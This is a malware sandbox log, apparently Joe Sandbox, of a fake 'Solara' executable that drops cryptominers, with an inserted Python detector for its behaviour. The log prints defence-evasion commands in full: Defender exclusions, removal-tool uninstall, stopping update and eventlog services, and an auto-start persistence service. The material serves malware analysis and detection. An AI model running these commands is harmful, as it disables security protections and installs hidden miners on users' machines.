Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "ARIBLEUL"
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "ARIBLEUL"
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto"
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto"
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "ARIBLEUL"
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "ARIBLEUL"
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA="Jump to behavior
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\eth.exe "C:\Users\user\AppData\Local\Temp\eth.exe" Jump to behavior
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\xmr.exe "C:\Users\user\AppData\Local\Temp\xmr.exe" Jump to behavior
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe "C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "ARIBLEUL"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "ARIBLEUL"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "ARIBLEUL"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "ARIBLEUL"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\kx new.exe "C:\Users\user\AppData\Local\Temp\kx new.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe"
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
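The child processes spawned by xmr new.exe above are the sample's defence-evasion stage: Add-MpPreference excludes the whole user profile, ProgramData and every .exe from Defender scanning; wusa /uninstall /kb:890830 removes the Malicious Software Removal Tool package; and sc stop on UsoSvc (Update Orchestrator), WaaSMedicSvc (Update Medic), wuauserv (Windows Update) and bits cuts off the update channel that would otherwise repair or re-deliver those defences. As an added illustration that is not part of the Joe Sandbox report, the Python below runs a small detector over constructed process-creation records modelled on those command lines. The field names (ParentImage, Image, CommandLine) follow Sysmon Event ID 1; the records themselves are made up for the example, and the technique labels and the user-writable-path heuristic are this example's own choices, not a Joe Sandbox or Sigma convention.

```python
import re
from dataclasses import dataclass

# Constructed Sysmon Event ID 1 style records, modelled on the command lines in
# the report above. Not real telemetry; the last record is a benign control.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\user\AppData\Local\Temp\xmr new.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe "
                    r"Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) "
                    r"-ExclusionExtension '.exe' -Force"},
    {"ParentImage": r"C:\Users\user\AppData\Local\Temp\xmr new.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"},
    {"ParentImage": r"C:\Users\user\AppData\Local\Temp\xmr new.exe",
     "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r"C:\Windows\system32\sc.exe stop WaaSMedicSvc"},
    # Benign control: an administrator restarting the print spooler from cmd.exe
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r"sc.exe stop Spooler"},
]

# Services stopped by the sample; all belong to Windows Update / BITS.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits"}
# KB890830 is the Malicious Software Removal Tool package.
MRT_KB = "kb:890830"
# Parent living in a user-writable directory is a strong corroborating signal.
USER_WRITABLE = re.compile(r"\\(appdata\\|temp\\|programdata\\|users\\public\\)", re.I)
EXCLUSION_RE = re.compile(r"add-mppreference\b.*?-exclusion(path|extension|process)\b", re.I | re.S)
WUSA_RE = re.compile(r"\bwusa(\.exe)?\b.*?/uninstall\b", re.I)


@dataclass(frozen=True)
class Finding:
    technique: str              # label chosen for this example
    detail: str
    parent_in_user_writable: bool


def detect(event):
    """Return the findings for one process-creation record (empty if benign)."""
    cmd = event.get("CommandLine", "")
    tokens = cmd.split()
    parent_flag = bool(USER_WRITABLE.search(event.get("ParentImage", "")))
    findings = []

    m = EXCLUSION_RE.search(cmd)
    if m:
        findings.append(Finding("defender_exclusion",
                                f"Add-MpPreference -Exclusion{m.group(1)}: {cmd}", parent_flag))

    if WUSA_RE.search(cmd) and MRT_KB in cmd.lower():
        findings.append(Finding("mrt_removal", "wusa /uninstall /kb:890830", parent_flag))

    # sc.exe stop <service>; the binary may appear as a full path or a bare name
    if (len(tokens) >= 3 and tokens[0].lower().strip('"').endswith("sc.exe")
            and tokens[1].lower() == "stop" and tokens[2].lower() in UPDATE_SERVICES):
        findings.append(Finding("update_service_stop", f"sc stop {tokens[2]}", parent_flag))

    return findings


def detect_all(events):
    return [f for e in events for f in detect(e)]


def techniques_seen(events):
    """Distinct technique labels observed across a batch, sorted for stable scoring."""
    return sorted({f.technique for f in detect_all(events)})


if __name__ == "__main__":
    for f in detect_all(SAMPLE_EVENTS):
        print(f"[{f.technique}] parent_in_user_writable={f.parent_in_user_writable}: {f.detail}")
```

The three malicious records each yield one finding with the user-writable-parent flag set, while the Spooler restart yields none: stopping a service is routine, so the rule keys on which service is stopped and who the parent is rather than on sc.exe alone. Any one of the three techniques on its own is low-confidence; seeing all three from the same parent in a short window is the pattern worth alerting on.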
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Solara.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\eth.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
